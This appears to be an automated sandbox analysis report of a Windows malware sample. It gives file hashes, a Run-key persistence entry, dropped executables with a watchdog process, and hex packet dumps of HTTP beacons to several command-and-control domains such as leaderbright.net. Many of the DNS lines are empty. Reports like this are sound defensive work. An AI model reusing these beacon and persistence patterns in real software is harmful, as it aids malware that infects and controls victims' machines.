Analysis Date2014-10-02 16:52:26

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2e6990f5ec97535e1a399836318d1a1b sha1: 2482b70f3dfe38fb153290621806b627f46ce4b1 size: 296448
Section.rdata md5: e3f60746ebbe546a9e71a52928627802 sha1: 31383caf164c95ab0deeb86e748348750ef48731 size: 34816 md5: 7fcfd8de3f4121d6e05c412dea0011bd sha1: 71d8b33d99b0dcc1040c02e4f71ba768af2a10e5 size: 95232
Timestamp2014-07-24 05:05:37
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Image Connection Interactive Performance ➝
C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe

↳ C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.mnaci
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\wnewlhdh.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206c6561 64657262 72696768   ost: leaderbrigh
0x00000070 (00112)   742e6e65 740d0a0d 0a        

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20616e73 77657272 65616479   ost: answerready
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a                  .net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20676c61 73737065 6f706c65   ost: glasspeople
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a                  .net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20646966 66696375 6c747065   ost: difficultpe
0x00000070 (00112)   6f706c65 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20706c65 6173616e 7470656f   ost: pleasantpeo
0x00000070 (00112)   706c652e 6e65740d 0a0d0a0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206c6561 64657272 65616479   ost: leaderready
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a0a            .net........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20766172 696f7573 70656f70   ost: variouspeop
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a0a  

         (((((                  H
         h((((                  H
